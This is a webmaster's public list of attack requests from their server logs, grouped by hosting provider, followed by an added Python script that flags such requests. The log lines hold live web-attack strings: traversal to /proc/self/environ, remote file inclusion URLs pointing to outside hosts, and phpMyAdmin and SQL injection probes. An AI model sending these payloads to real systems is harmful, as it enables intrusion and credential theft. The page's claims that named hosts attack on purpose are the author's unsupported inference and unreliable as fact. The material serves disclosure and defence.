As the number of attacks from compromised servers and hosts increases, we will publish details of the attacks from these servers, since their webmasters are incapable of or unwilling to rectify their issues. These hosts, whether through negligence, ignorance or on purpose, impact our business, and therefore we are forced to list details of the attacks.
We do not recommend doing business with the hosts mentioned, as one way or another they allow their servers to become attack platforms and abused web tools, responsible for piracy, spam and scams on the internet.
For the inexperienced reader, what do the entries mean? They show requests from outsiders to access our server in a way that constitutes an attack. Attacks may aim at downloading login credentials for piracy, promoting scams, sending spam e-mails, compromising the software our server runs, and other illegal web methods. The information posted was extracted directly from the server logs and represents a tiny sample, using the URLs/links only.
For the experienced reader, you may wonder why we provide the full IP with the attack details. The answer is that a host has ways to determine, and can easily tell, whether one of its clients performs malicious requests or whether a server is compromised. Therefore the odds are that these attacks take place on purpose. Denial of service, hack attempts and content scraping are nowadays routine. Had we served these requests, the bandwidth waste on our server would have been high enough to deplete the resources allocated by our host.
The hosts in the entries listed below represent the root hosts (not their customers). They have been notified on many occasions via e-mail and no action to correct the problems was taken. Server log details are kept for over two years, although the data posted here is quite recent. Responses from the hosts are typically automated, and in the best case a second e-mail only states that the host has notified their "customers". In other words, they notified the attacker about our report, since their servers are compromised. A truly great idea.
Each entry is taken from our server logs, showing the exact IP, date and attack vector. Where appropriate, further details of the attack patterns are shown. The IP is the one associated with the host at the time the entry was logged.
Host: dreamhost.com
Multiple attacks, denial of service attempts.
173.236.200.176 - - [05/Dec/2010:02:12:55 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.163.178.138 - - [05/Dec/2010:02:12:55 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.163.243.64 - - [05/Dec/2010:02:12:55 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.163.195.20 - - [05/Dec/2010:02:12:55 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.236.193.151 - - [05/Dec/2010:02:13:03 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
208.113.132.76 - - [05/Dec/2010:02:21:18 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
67.205.4.131 - - [05/Dec/2010:02:21:05 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.163.139.44 - - [05/Dec/2010:02:21:05 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.163.178.14 - - [05/Dec/2010:02:21:04 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
On purpose hack attempts by host, coordinated attacks to access folders with login credentials. Several IPs originated from dreamhost within a very short period of time, also indicating DoS attempts.
Host: 800hosting.net
69.41.186.62 - - [03/Dec/2010:04:13:36 -0500] "GET //phpMyAdmin1/scripts/setup.php HTTP/1.1" 301 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Compromised or on purpose hack attempts by host, database tools access attempt.
Host: imagikids.com
125.215.205.180 - - [03/Dec/2010:13:26:52 -0500] "GET //phpmyadmin/ HTTP/1.1" 301 5 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
Compromised or on purpose hack attempts by host, database access probe.
Host: presspublisher.com
209.188.90.53 - - [02/Dec/2010:10:35:31 -0500] "GET //*.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.837"
Compromised or on purpose hack attempts by host.
Host: afraid.org
69.147.241.196 - - [03/Dec/2010:16:03:13 -0500] "GET /checkout_payment.php?id=' HTTP/1.1" 301 5 "-" "libwww-perl/5.837"
Compromised or on purpose SQL injection probe.
Host: vanet.com.br
189.38.59.146 - - [02/Dec/2010:09:36:14 -0500] "GET /?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.803"
Compromised or on purpose hack attempts by host.
Host: mochasupport.com
70.87.135.194 - - [02/Dec/2010:09:32:16 -0500] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5
Compromised or on purpose hack attempts by host.
Host: softlayer.com
208.101.22.154 - - [02/Dec/2010:09:30:50 -0500] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5
Compromised or on purpose hack attempts by host.
Host: emailsearchzone.info
188.72.241.104 - - [02/Dec/2010:09:02:35 -0500] "GET /webdav/ HTTP/1.1" 301 5 "-" "Java/1.6.0_22"
Probe for specific scripts and folders.
Host: worldnic.com
216.38.49.38 - - [02/Dec/2010:09:00:46 -0500] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.837"
Compromised or on purpose hack attempts by host.
Host: hostmonster.com
66.147.240.197 - - [02/Dec/2010:09:00:41 -0500] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.833"
Compromised or on purpose hack attempts by host.
Host: njtech.com
216.151.163.114 - - [02/Dec/2010:09:00:36 -0500] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.805"
Compromised or on purpose hack attempts by host, scans for private folders to download passwords or other details to gain access to the server.
Host: mydyndns.org
72.249.167.184 - - [02/Dec/2010:01:08:37 -0500] "GET /?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.837"
Compromised or on purpose hack attempts by host, scans for private folders to download passwords or other details to gain access to the server.
Host: cs-rds.ro
86.123.139.71 - - [02/Dec/2010:00:28:38 -0500] "GET /index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.803"
Compromised or on purpose hack attempts by host, scans for private folders to download passwords or other details to gain access to the server.
Host: easyserver.net
82.192.65.135 - - [01/Dec/2010:03:48:51 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.803"
Compromised or on purpose hack attempts by host, scans for private folders to download passwords or other details to gain access to the server.
Host: ovh.net
87.98.217.201 - - [30/Nov/2010:01:35:32 -0500] "GET //index2.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.803"
Compromised or on purpose hack attempts by host, scans for private folders to download passwords or other details to gain access to the server.
94.23.218.45 - - [01/Nov/2010:23:13:18 -0400] "GET ////bbs_sun/board.php?admin=0x50sec.org&pgUp=http://varzo.webs.com/z1.txt?? HTTP/1.1" 301 5 "-" "Mozilla/5.0"
Remote File Inclusion attempt.
94.23.6.59 - - [06/Nov/2010:04:17:02 -0400] "GET //*.php?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.803"
Compromised or on purpose hack attempts by host, scans for private folders to download password details.
Host: iwsservers.com
205.251.131.33 - - [01/Nov/2010:14:58:14 -0400] "GET /?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 301 5
Compromised or on purpose hack attempts by host, Remote File Inclusion attempts.
Host: 1and1.com
87.106.223.180 - - [01/Nov/2010:23:42:18 -0400] "GET /?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.805"
Compromised or on purpose hack attempts by host, multiple attempts by the 1and1.com host to steal login credentials.
Host: mediatemple.net
205.186.131.223 - - [02/Nov/2010:02:31:20 -0400] "GET //index2.php?option=com_online&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.805"
Compromised or on purpose hack attempts by host, path exploit to steal login credentials.
Host: uk2.net
77.92.74.100 - - [02/Nov/2010:02:31:54 -0400] "GET //index2.php?option=com_online&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.837"
Compromised or on purpose hack attempts by host, path exploit to steal login information.
Host: pixelcarve.com
174.142.53.54 - - [02/Nov/2010:02:32:19 -0400] "GET //index2.php?option=com_online&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.837"
Compromised or on purpose hack attempts by host, path exploit to steal login credentials.
Host: fastname.no
85.19.150.100 - - [02/Nov/2010:02:32:58 -0400] "GET //index2.php?option=com_online&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.808"
Compromised or on purpose hack attempts by host, path exploit attempts to steal login information.
Host: ThePlanet.com
69.93.76.2 - - [02/Nov/2010:03:41:05 -0400] "GET /?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.837"
On purpose hack attempts by host, path exploit attempts to steal login information. Host is responsible for a huge number of attacks on our domain, spam e-mails, hack attempts. Probably the most notorious host on the web.
Host: proxad.net
88.183.92.209 - - [03/Nov/2010:01:21:52 -0400] "GET /?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.805"
Compromised or on purpose hack attempts by host, path exploit attempts to steal login information.
Host: name-server.com.au
113.20.10.185 - - [04/Nov/2010:17:31:14 -0400] "GET //Patch/catalog/admin/modules.php?module_directory=http://www.vai.com.au/xmlrpc/cache/data/sc1.txt????? HTTP/1.1" 301 5 "-" "Mozilla/5.0"
Compromised or on purpose hack attempts by host, follows Remote File Inclusion methods.
Host: infoferenda.net
92.52.71.146 - - [05/Nov/2010:01:56:22 -0400] "GET /?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.805"
Compromised or on purpose hack attempts by host, path exploit attempts to steal login information.
Host: stratoserver.net
85.214.156.86 - - [06/Nov/2010:04:16:57 -0400] "GET //*.php?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.837"
Compromised or on purpose hack attempts by host, path exploit attempts to steal login information.
Host: webhostingspider.com
67.214.166.10 - - [06/Nov/2010:19:53:53 -0400] "GET //redirect.php?path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.837"
Compromised or on purpose hack attempts by host, path exploit attempts to steal login information.
Host: ntdns.de
80.82.209.106 - - [07/Nov/2010:01:13:43 -0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 301 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Compromised or on purpose hack attempts by host, phpMyAdmin probe to access database information. Repeated attempts using different paths.
Host: wiresix.com
66.71.254.10 - - [07/Nov/2010:01:40:48 -0400] "GET /oscommerce-vulnerabilities-10-08.asp//?path=http://www.yeshouse.net/column/lecture/Ckrid1.txt?? HTTP/1.1" 301 5 "-" "MaMa CaSpEr"
Compromised or on purpose hack attempts by host; follows redirects and performs remote file inclusion attacks.
Host: rackspace.com
67.192.61.235 - - [09/Mar/2011:10:27:56 -0500] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.79"
67.192.61.235 - - [11/Mar/2011:06:32:04 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5 "-" "libwww-perl/5.79"
Various hack attempts by host; follows redirects and performs remote file inclusion attacks. Despite our reports via e-mail with dozens of hack attempts, the attacks continue.
Host: leaseweb.com
95.211.48.9 - - [12/Mar/2011:11:51:45 -0500] "GET /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 301 5
95.211.48.9 - - [12/Mar/2011:11:57:55 -0500] "GET /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 301 5
Another notorious host, a breeding ground for spammers and scammers. Numerous hack attempts, spam e-mails, attempts to compromise other servers.
You may wonder how the server logs are generated. The server logs every GET request from visitors. These logs are then parsed and the malicious attempts to compromise the server are identified. From the entries that show abuse in some way, we follow their patterns and decide which attacks are systematic.
Also note that the listing is a sample; there are repeated attacks which can span a period of several years, following different attack patterns.
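As an added example (not part of the original page, and not the tooling its authors use), here is a small Python script that does what the paragraph above describes: it parses combined-format log lines like the ones listed on this page, labels the request patterns that appear in the entries (directory traversal to /proc/self/environ, an absolute http URL in a parameter as in the Remote File Inclusion entries, phpMyAdmin and WebDAV probes, a lone quote in a parameter as in the SQL injection probe, null bytes), and reports when several distinct IPs hit the same URL within a short window, as in the dreamhost.com entries. The sample log embedded in it is copied from the entries above plus one constructed benign request from 203.0.113.5; the label names, the 60-second window and the three-IP threshold are my own choices, not something the page defines.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# Combined log format as produced by Apache/nginx. The referer and user-agent
# fields are optional because some entries on this page were logged without them.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Sample input: nine entries copied from the listing on this page plus one
# constructed benign request (203.0.113.5) that must not be flagged.
SAMPLE_LOG = [
    '173.236.200.176 - - [05/Dec/2010:02:12:55 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"',
    '69.163.178.138 - - [05/Dec/2010:02:12:55 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"',
    '69.163.243.64 - - [05/Dec/2010:02:12:55 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"',
    '69.163.195.20 - - [05/Dec/2010:02:12:55 -0500] "GET /general.php?page=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"',
    '69.41.186.62 - - [03/Dec/2010:04:13:36 -0500] "GET //phpMyAdmin1/scripts/setup.php HTTP/1.1" 301 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '69.147.241.196 - - [03/Dec/2010:16:03:13 -0500] "GET /checkout_payment.php?id=\' HTTP/1.1" 301 5 "-" "libwww-perl/5.837"',
    '205.251.131.33 - - [01/Nov/2010:14:58:14 -0400] "GET /?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 301 5',
    '188.72.241.104 - - [02/Dec/2010:09:02:35 -0500] "GET /webdav/ HTTP/1.1" 301 5 "-" "Java/1.6.0_22"',
    '70.87.135.194 - - [02/Dec/2010:09:32:16 -0500] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 301 5',
    '203.0.113.5 - - [05/Dec/2010:02:15:00 -0500] "GET /index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',  # constructed benign request
]


def parse_line(line):
    """Split one combined-format log line into a dict; return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def classify(url):
    """Return the list of heuristic labels a request URL matches (empty list = nothing suspicious).

    The URL is split on the first '?' by hand because urlsplit() would read a leading '//' as a host."""
    path, _, query = url.partition("?")
    values = [v for vs in parse_qs(query, keep_blank_values=True).values() for v in vs]
    labels = []
    # Directory traversal aimed at /proc/self/environ, the pattern in most entries on this page.
    if "/proc/self/environ" in path or any("../" in v and "/proc/self/environ" in v for v in values):
        labels.append("lfi-traversal")
    # Remote file inclusion: a parameter whose value is an absolute http(s) URL.
    if any(re.match(r"https?://", v, re.I) for v in values):
        labels.append("rfi")
    # Null byte (%00) used to cut off whatever the vulnerable script appends to the path.
    if any("\x00" in v for v in values):
        labels.append("null-byte")
    if "phpmyadmin" in path.lower():
        labels.append("phpmyadmin-probe")
    if "/webdav" in path.lower():
        labels.append("webdav-probe")
    # A quote followed by a SQL keyword, a comment marker, or the end of the value.
    if any(re.search(r"'\s*(or|and|union|--|#|$)", v, re.I) for v in values):
        labels.append("sqli-probe")
    return labels


def find_bursts(records, window=timedelta(seconds=60), min_ips=3):
    """Report flagged URLs hit by at least min_ips distinct IPs inside one time window."""
    by_url = defaultdict(list)
    for r in records:
        if r["labels"]:
            by_url[r["url"]].append((r["ts"], r["ip"]))
    bursts = []
    for url, events in by_url.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            ips = {ip for t, ip in events[i:] if t - t0 <= window}
            if len(ips) >= min_ips:
                bursts.append({"url": url, "start": t0, "ips": sorted(ips)})
                break  # one report per URL is enough
    return bursts


def analyze(lines):
    """Parse and label every line; return (flagged records, bursts)."""
    records = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # not a request line we understand; skip rather than guess
        rec["labels"] = classify(rec["url"])
        records.append(rec)
    flagged = [r for r in records if r["labels"]]
    return flagged, find_bursts(records)


if __name__ == "__main__":
    flagged, bursts = analyze(SAMPLE_LOG)
    for r in flagged:
        print(f'{r["ts"]:%Y-%m-%d %H:%M:%S} {r["ip"]:16} {",".join(r["labels"]):24} {r["url"][:60]}')
    for b in bursts:
        print(f'burst: {len(b["ips"])} IPs hit {b["url"][:40]}... from {b["start"]:%H:%M:%S}: {", ".join(b["ips"])}')
```

Run against a real access log with `analyze(open("access.log"))`; the labels are heuristics tuned to the patterns on this page, so review the flagged lines before treating any IP as hostile, and note that a 301 or 404 status in the log means the request was answered, not that it succeeded.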